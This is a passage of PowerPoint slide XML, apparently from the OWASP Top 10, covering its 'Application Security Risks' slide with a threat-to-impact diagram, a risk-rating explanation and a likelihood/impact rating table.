        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="34861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a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Asset</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3076575"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 250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a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Function</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="26860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a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Asset</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2905125"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6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  Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="66" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="211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sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="247650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Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733799" y="291465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Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="3810000"/>
              <a:ext cx="457200" cy="3810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Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362200" y="3800475"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2640" y="2743"/>
                <a:ext cx="528" cy="288"/>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  Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="98" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="56" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="44026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2" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="3" idx="3"/>
              <a:endCxn id="79" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="2666731"/>
              <a:ext cx="228600" cy="269"/>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5" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="66" idx="3"/>
              <a:endCxn id="80" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="3104885"/>
              <a:ext cx="228599" cy="265"/>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4" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="238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20" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="64" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="242873"/>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6" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2667000"/>
              <a:ext cx="457200" cy="233348"/>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58" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="80" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4190999" y="2900348"/>
              <a:ext cx="457201" cy="20480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33" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="419100"/>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88" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="81" idx="3"/>
              <a:endCxn id="62" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4191000" y="3290903"/>
              <a:ext cx="457200" cy="709597"/>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91" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="85" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490728" cy="897466"/>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0" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="85" idx="3"/>
              <a:endCxn id="81" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505199" y="4000235"/>
              <a:ext cx="228601" cy="265"/>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7" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="62" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="633428"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3659399" y="2090853"/>
              <a:ext cx="590226"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rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Controls</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 68"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2606391268"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4953578"/>
          <a:ext cx="4495800" cy="4190421"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4495800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="346793">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0"/>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t> Risk?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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8436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700" kern="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.  </a:t>
                      </a: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lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>In this edition, we have changed the risk rating system around compared to previous version to assist with our ranking of likelihoods and impacts. This is not an issue within the document, but is clear in the public data analysis. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Each organization is unique, and so are the threat actors for that organization, their goals, and the impact of any breach. If a public interest organization uses a CMS for public information and a health system uses that same exact CMS for sensitive health records, the threat actors and business impacts are very different for the same exact software. It is critical that you apply your custom threat agents and business impacts based upon the data asset criticality.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" u="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Where possible, the names of the risks in the Top 10 are aligned with CWE weaknesses to promote generally accepted security practices and to reduce confusion. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFil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2" name="Table 71"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2044036359"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="6111240"/>
          <a:ext cx="4191001" cy="1051560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="620889">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="737306">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="737306">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="737306">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="672392">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="685802">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Threat</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Agents</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900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Weakness Prevalence</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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Weakness Detectability</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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Technical Impacts</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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Business Impacts</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152400">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="1"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900" dirty="0"/>
                        <a:t>Easy</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Widespread</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Easy</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Severe</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>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50" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> / Business Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1"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52400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Average</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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Common</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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Average</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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Moderate</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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Difficult</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a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Uncommon</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a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Difficult</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a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0"/>
                        <a:t>Minor</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="71" name="Table 70"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417672387"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="4953000"/>
          <a:ext cx="2236914" cy="4191000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2236914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="347882">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>References</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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8431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700" kern="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kern="1200" baseline="0" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                        <a:solidFill>
